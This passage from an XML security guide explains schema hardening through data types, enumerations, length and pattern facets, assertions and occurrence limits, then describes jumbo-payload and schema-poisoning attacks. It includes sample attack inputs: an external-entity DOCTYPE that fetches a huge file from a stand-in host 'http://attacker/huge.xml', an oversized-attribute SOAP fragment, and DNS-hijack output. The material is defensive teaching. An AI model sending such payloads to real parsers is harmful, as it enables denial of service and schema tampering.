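Returning to the hexadecimal case mentioned at the start of this section, a minimal sketch of the difference could look as follows. The element names &amp;lt;tt&amp;gt;looseDigest&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; are hypothetical; the built-in &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; type already limits the content to pairs of hexadecimal digits, so no hand-written restriction is needed:&lt;br /&gt;
 &amp;lt;!-- Hypothetical: a plain string that still has to be restricted by hand --&amp;gt;&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;looseDigest&amp;quot; type=&amp;quot;xs:string&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;!-- Hypothetical: the built-in type expresses the intent directly --&amp;gt;&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;digest&amp;quot; type=&amp;quot;'''xs:hexBinary'''&amp;quot;/&amp;gt;&lt;br /&gt;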
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account: a quantity of -1 at a price of 10 yields a total of -10. To avoid this logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If any other type of restriction is used, a denominator of zero may still be accepted and trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
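With this schema, the application will not run into errors caused by a price of Infinity or NaN, because the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type does not accept these values and such a document will be rejected as invalid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;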
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: a traffic light has only three colors, a year has only 12 months, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called an &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML Schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes in XML schemas (assertions were introduced in XML Schema 1.1, so they require a processor that supports that version). An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
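&lt;br /&gt;
Assertions can also relate the values of sibling elements, which a facet on a single simple type cannot do. The following sketch is only an illustration: the element names &amp;lt;tt&amp;gt;range&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;min&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;max&amp;lt;/tt&amp;gt; are hypothetical, and it assumes an XML Schema 1.1 processor. It uses &amp;lt;tt&amp;gt;xs:assert&amp;lt;/tt&amp;gt; on a complex type to require that &amp;lt;tt&amp;gt;min&amp;lt;/tt&amp;gt; is never greater than &amp;lt;tt&amp;gt;max&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;range&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;min&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;max&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;!-- Hypothetical rule: the document is invalid when min exceeds max --&amp;gt;&lt;br /&gt;
   &amp;lt;xs:'''assert''' test=&amp;quot;min le max&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;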
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences leaves the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
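&lt;br /&gt;
A bounded variant of the same schema might look like the following sketch. The limit of 100 &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements is an assumed value chosen only for illustration; a real limit should come from testing what the application can process safely:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;!-- Assumed limit: at most 100 purchases per operation --&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''100'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;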
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, it must contain a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not have the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
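&lt;br /&gt;
A minimal Python sketch of how such a permission problem could be detected before a local schema is trusted. The helper names &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;lock_down&amp;lt;/tt&amp;gt; are hypothetical, and the sketch assumes a POSIX filesystem:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True when users outside the owner and group may write to path."""
    mode = os.stat(path).st_mode
    # stat.filemode() renders the mode like "-rw-rw-rw-"; index 8 is the
    # write flag for users who are neither the owner nor in the group.
    return stat.filemode(mode)[8] == "w"


def lock_down(path):
    """Restrict the file to owner read/write and read-only for everyone else."""
    os.chmod(path, 0o644)
```

A deployment script could call &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; on every local schema and refuse to start, or call &amp;lt;tt&amp;gt;lock_down&amp;lt;/tt&amp;gt;, when it returns true.&lt;br /&gt;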
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker able to intercept the connection could sniff and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
